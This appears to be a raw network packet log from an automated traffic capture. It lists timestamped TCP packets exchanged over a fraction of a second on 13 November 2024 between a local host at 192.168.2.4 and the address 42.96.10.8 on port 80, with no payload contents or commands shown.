                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805859089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805875063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805892944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805905104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805908918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805926085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805933952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805962086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805969954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805985928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.805999994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806026936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806091070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806107044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806123018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806138039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806154013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806164980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806164980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806180954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806197882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806211948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806226969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806226969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806252003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806267023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806284904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806301117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806313038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806313038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806364059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806377888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806392908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806404114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806407928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806421041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806421995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806438923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806462049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806572914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806720972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806735992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806751013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806776047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806791067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806806087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806818008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806818008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806880951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806909084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806909084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806926966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806971073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806976080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.806988001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807003021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807018042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807034016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807048082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807081938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807081938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807130098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807224035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807239056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807254076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807280064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807280064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807298899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807320118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807332993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807348967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807357073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807368040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807384014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807410002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807425976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807434082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807434082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807441950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807456970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807482004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807497978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807502031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807526112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807539940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807543993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807559967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807565928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807575941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807590961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807600021 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807609081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807648897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807648897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807682991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807698965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807713985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807729959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807745934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807775021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807787895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807787895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807801008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807826996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807840109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807842970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807862043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807902098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807903051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807919979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807939053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807945013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807969093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.807982922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808000088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808015108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808099985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808115005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808131933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808147907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808163881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808180094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808207035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808207035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808291912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808305025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808319092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808334112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808347940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808362961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808374882 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808374882 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808389902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808404922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808407068 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808423042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808439016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808456898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808464050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808464050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808473110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808490038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808530092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808531046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808531046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808547974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808564901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808624029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808636904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808640003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808655977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808669090 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808676004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808691978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808712006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808754921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808770895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808787107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808795929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808804035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808821917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808837891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808845997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808845997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808882952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808897018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.808927059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.809034109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.849476099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.849520922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.849535942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.849553108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.849567890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.849582911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.849596977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.849689007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.849970102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.849986076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.850002050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.850017071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.850033045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.850045919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.850048065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.850073099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.850290060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.850311041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.850344896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.850361109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.850405931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.850421906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.850449085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.892246008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.892263889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.892278910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.892436028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.900973082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.900989056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.901004076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.901196957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.902034998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.902065039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.902079105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.902126074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.902141094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.902156115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.902156115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.902183056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.902328014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.902343988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.902420044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921083927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921112061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921125889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921135902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921216011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921240091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921304941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921320915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921346903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921350002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921366930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921382904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921399117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921407938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921412945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921430111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921431065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921447992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921453953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921484947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921514034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921514034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921530962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921555996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921597004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921619892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921634912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921652079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921674967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921715975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921720982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921735048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921749115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921763897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921781063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921782017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921792984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921806097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921819925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921844006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921845913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921861887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921871901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921880960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921916008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921960115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921976089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921988010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.921993017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922045946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922061920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922070980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922079086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922105074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922137022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922291040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922317028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922331095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922382116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922396898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922410011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922422886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922437906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922439098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922463894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922467947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922485113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922499895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922501087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922522068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922538042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922552109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922617912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922774076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922791004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922806025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922831059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922847986 CET804973342.96.10.8192.168.2.4
